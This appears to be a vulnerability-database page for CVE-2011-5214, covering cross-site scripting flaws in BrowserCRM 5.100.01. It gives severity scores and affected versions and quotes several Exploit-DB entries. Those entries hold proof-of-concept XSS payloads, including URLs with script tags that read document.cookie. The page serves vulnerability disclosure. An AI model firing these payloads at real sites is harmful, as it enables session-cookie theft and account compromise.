CVE-2011-5214
published 2012-10-25CVE-2011-5214: Multiple cross-site scripting (XSS) vulnerabilities in BrowserCRM 5.100.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the…
PriorityP424medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
4.85%
90.9th percentile
Multiple cross-site scripting (XSS) vulnerabilities in BrowserCRM 5.100.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) modules/admin/admin_module_index.php, or (3) modules/calendar/customise_calendar_times.php; login[] parameter to (4) index.php or (5) pub/clients.php; or framed parameter to (6) licence/index.php or (7) licence/view.php.
Affected
29 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| browsercrm | browsercrm | <= 5.100.01 | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
| browsercrm | browsercrm | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting
exploitdb·2011-12-14
CVE-2011-5214 BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting
BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51060/info
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
alert(1);'>
alert(2);'>
alert(3);'>
alert(4);'>
alert(5);'>
alert(6);'>
alert(7);'>
Exploit-DB
BrowserCRM 5.100.1 - URI Cross-Site Scripting
exploitdb·2011-12-14
CVE-2011-5214 BrowserCRM 5.100.1 - URI Cross-Site Scripting
BrowserCRM 5.100.1 - URI Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51060/info
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
http://www.
Exploit-DB
BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting
exploitdb·2011-12-14
CVE-2011-5214 BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting
BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51060/info
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
alert(1);'>
alert(2);'>
alert(3);'>
alert(4);'>
alert(5);'>
alert(6);'>
Exploit-DB
BrowserCRM 5.100.1 - 'framed' Cross-Site Scripting
exploitdb·2011-12-14
CVE-2011-5214 BrowserCRM 5.100.1 - 'framed' Cross-Site Scripting
BrowserCRM 5.100.1 - 'framed' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/51060/info
Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Browser CRM 5.100.01 is vulnerable; prior versions may also be affected.
http://www.example.com/licence/index.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
No writeups or analysis indexed.
http://osvdb.org/77728http://osvdb.org/77729http://osvdb.org/77730http://osvdb.org/77731http://osvdb.org/77732http://secunia.com/advisories/47217https://exchange.xforce.ibmcloud.com/vulnerabilities/71827https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_browser_crm.htmlhttp://osvdb.org/77728http://osvdb.org/77729http://osvdb.org/77730http://osvdb.org/77731http://osvdb.org/77732http://secunia.com/advisories/47217https://exchange.xforce.ibmcloud.com/vulnerabilities/71827https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_browser_crm.html
2012-10-25
Published